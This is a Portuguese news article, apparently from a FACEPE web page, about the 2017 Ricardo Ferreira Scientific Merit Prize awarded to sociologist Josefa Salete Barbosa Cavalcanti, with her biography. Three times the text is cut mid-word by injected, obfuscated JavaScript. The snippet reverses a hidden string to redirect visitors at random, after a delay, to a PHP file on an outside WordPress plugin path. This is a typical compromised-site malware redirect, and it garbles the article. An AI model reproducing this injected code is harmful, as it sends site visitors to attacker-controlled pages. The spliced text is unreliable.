FACEPE entrega Prêmio Ricardo Ferreira ao Mérito Científico 2017

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (18)A Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco – FACEPE – entregou na tarde desta quarta-feira (25), o prêmio Ricardo Ferreira ao Mérito Científico para a pesquisadora Josefa Salete Barbosa Cavalcanti em cerimônia realizada no Salão Nobre da instituição. A solenidade contou com a presença da Secretária de Ciência, Tecnologia e Inovação do Estado de Pernambuco, Lúcia Melo, o presidente da Fundação, Abraham Sicsú, o Diretor Científico, Paulo Cunha, além de outras autoridades.

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (19)Lúcia Melo parabenizou a FACEPE pela iniciativa, como também a pesquisadora Josefa Cavalcanti pelo prêmio, e defendeu que este é um incentivo imenso para pesquisadores e cientistas de todo Nordeste.

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (02)O presidente da FACEPE, Abraham Sicsú, abriu a solenidade com o salão lotado e agradeceu a todos os presentes. O diploma e a medalha foram entregues pelas representantes do Comitê de Busca e da comunidade científica pernambucana, profas. Profas. Maria do Socorro Ferraz Barbosa e Silke Weber à Profa. Josefa Salete Barbosa Cavalcanti.
2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (09)

Ela agradeceu o reconhecimento e disse que era uma alegria vê tanta manifestação de carinho e afeto. Durante o seu discurso, Josefa fez uma explanação da sua vida acadêmica e lembrou o tempo em que deu início ao estudo da ruralidade no mundo moderno, em 1963. A eleição da premiada foi realizada na 2ª Reunião Ordinária de 2017 do Conselho Superior da FACEPE, em 6 de junho deste ano, e a área agraciada foi a de Ciências Humanas, Letras e Sociais.

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (15)“Fui amiga, aluna e orientada de Ricardo Ferreira. Mas o que mais me chamava atenção nele era sua característica humanista. Ricardo descobriu a química moderna, qu$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando ninguém sabia do que se tratava”, disse Lúcia Melo, ao destacar que a pós-graduação pernambucana está viva e é o celeiro principal da formação humana. “Esse momento é importante para reafirmar a importância da FACEPE para Pernambuco que, atualmente, é um exemplo de instituição de pesquisa”, destacou ela, ao finalizar dizendo que a instituição de fomento à pesquisa e a SECTI seguem trabalh$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando pelo futuro de Pernambuco.

Prêmio Ricardo Ferreira ao Mérito Científico: Criado em 2014, constitui-se como reconhecimento público e estímulo a um cientista brasileiro ou estrangeiro com permanência mínima de 10 anos em Pernambuco que tenha se destacado pela realização de contribuição científica ou tecnológica de extraordinário valor para o progresso da sua área do conhecimento. Em 2017, concedido para a área de “Ciências Humana, Letras e Sociais Aplicadas”.

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (12)Josefa Salete Barbosa Cavalcanti - A homenageada de 2017 é professora titular do Departamento de Sociologia do Centro de Filosofia e Ciências Humanas da Universidade Federal de Pernambuco e dos Programas de Pós-Graduação em Sociologia e em Antropologia da UFPE e pesquisadora 1-C do CNPq. Tem doutorado em Sociologia pela Manchester University e mestrado em Antropologia Social pela  UFRJ, com pós-doutorado na University of Wisconsin/Madison e na Cardiff University.

Coordenadora e membro do comitê assessor do CNPq(2011-2014); foi membro da comissão de avaliação de cursos de pós-graduação da área de Sociologia da Coordenação de Aperfeiçoamento de Pessoal de Nível Superior. Ex-Secretária geral da Sociedade Brasileira de Sociologia (2005-2007). Ex-Vice-Presidente da Associação Latino-Americana de Sociologia Rural. Áreas de atuação: Antropologia e Sociologia, com ênfase em Sociologia Rural e Antropologia Rural. Principais temas: globalização da agricultura e dos alimentos; desenvolvimento rural, sociedades camponesas; desigualdades sociais; trabalhadores migrantes, trabalho e gênero.

Publicou 23 artigos, 27 trabalhos em anais, 61 resumos, 12 livros e 55 capítulos de livros. A profa. Josefa foi agraciada recentemente com o Prêmio Florestan Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes 2017 concedido pela Sociedade Brasileira de Sociologia (SBS).

2017_10_25-Entrega_Premio_Ricardo_Ferreira-web (01)